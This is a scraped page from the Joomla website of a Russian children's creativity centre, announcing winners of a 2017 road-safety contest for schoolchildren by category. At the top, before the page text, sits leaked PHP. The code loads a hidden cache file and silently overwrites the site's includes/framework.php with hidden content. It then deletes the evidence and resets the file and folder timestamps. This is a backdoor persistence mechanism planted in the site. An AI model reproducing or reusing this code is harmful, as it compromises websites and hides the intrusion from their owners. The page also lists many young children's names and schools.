$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } «Правила Дорожного Движения глазами юного пешехода»
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы иметь возможность оставлять комментарии и скачивать фотографии из нашей "ФОТОГАЛЕРЕИ".



Спасибо за регистрацию.

План мероприятий

Сентябрь 2017
Пн Вт Ср Чт Пт Сб Вс
28 29 30 31 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 1
Developed by JoomVision.com
Баннер

«Правила Дорожного Движения глазами юного пешехода» PDF Печать E-mail

     22 февраля в Доме детского творчества были подведены итоги конкурса «Правила Дорожного Движения глазами юного пешехода», организованный РОО, ДДТ и Отделом министерства внутренних дел по Новосергиевскому району по предупреждению детского дорожно-транспортного травматизма и смертности детей на дорогах. В конкурсе приняли участие учащиеся с 1 по 9 класс.

     В конкурсе приняли участие 9 образовательных учреждений района: Новосергиевская СОШ №1,4; Кулагинская, Мустаевская, Герасимовская, Землянская ООШ, Краснополянская ООШ, Горная ООШ и ШРР «Филиппок» ДДТ. Всего было представлено 65 работ.

     Работы оценивались по следующим номинациям и возрастным категориям:

Номинация «Поделки»:

1 место Сенькина Светлана 4 «Б» кл НСОШ № 1

1 место Яворский Сергей 6 лет ШРР Филиппок

1 место Скоков Артем 6 лет ШРР Филиппок

1 место Казаков Михаил 6 лет ШРР Филиппок

2 место Соболева Надежда 2 кл Герасимовская СОШ

2 место Попов Данила 3 «Б» кл НСОШ № 4

2 место Агафонова Анна 6 лет ШРР «Филиппок»

3 место Зеленская Ксения НСОШ № 4                

3 место Проценко Полина 6 лет ШРР «Филиппок»

Номинация «Стенгазета»

1 место Шинкарев Матвей 2 кл Землянская ООШ

2 место Андреева Вера 3 «А» кл НСОШ № 4    

Номинация «Плакат»

1 место Федоров Андрей 3 «А» кл НСОШ № 4

1 место Денисова Диана 2 кл Землянская ООШ Рук. Садыкова Г. Б.

2 место Козурман Софья Землянская ООШ

2 место Андреева Вера 3 «А» кл НСОШ № 4  

3 место Ярмухаметова Кристина 8 кл Горная ООШ Рук. Зыкунова Г. В.            

Номинация «Комикс»:

1 место Солопаева Лика НСОШ № 4

Номинация «Рукописный журнал»:

1 место Коллектив учащихся 5 кл Кулагинская СОШ Рук. Дедова Л. В.

Номинация «Книжка-малышка»:

1 место Доровских Илья 3 «Б» кл НСОШ № 4

1 место Сотник Никита 6 лет ШРР Филиппок

3 место Редько Варвара 3 «А» кл НСОШ № 4

Номинация «Рисунок»:

2 место Барабанщиков Антон 2 кл Герасимовская СОШ

2 место Мындря Дарья 6 лет ШРР Филиппок

2 место Конева Елена 6 лет ШРР «Филиппок»

3 место Растопчина Валентина 3 кл Герасимовская СОШ Рук. Маслова Г.В.

3 место Вольф Мирослава 2 кл Герасимовская СОШ Рук. Белоклокова О.В.

3 место Раянова Аделина 4 «Б» кл НСОШ № 1

3 место Головкова Елизавета 6 лет ШРР «Филиппок»

Номинация «Частушки о ПДД»:

1 место Сафиуллина Наталья 7 кл Кулагинская СОШ Рук. Сафиуллина О. П.

Номинация «Пожелание водителю»:

1 место Сергеева Ульяна 4 кл Герасимовская СОШ Рук. Голикова Т. И.  

3 место Мосолова Маргарита 6 кл Мустаевская СОШ

Номинация «Маршрутный лист»:

1 место Бражкина Ульяна 4 кл Герасимовская СОШ Рук. Круглова Е. Н.

1 место Нехрапов Иван 6 лет ШРР «Филиппок»

2 место Силкина Дарья 3 «А» кл НСОШ № 4

3 место Зацепина Софья НСОШ № 3

3 место Компанеец Анастасия 4 кл Герасимовская СОШ Рук. Круглова Е. Н.

Номинация «Стихи»:  

3 место Авдонина Дарья 5 кл Герасимовская СОШ Рук. Ганина В. А.

Номинация «Загадки»:

2 место Стрюков Александр 5 кл Герасимовская СОШ Рук. Ганина В. А.

 

comback_black_green_75

Обновлено 10.03.2017 14:52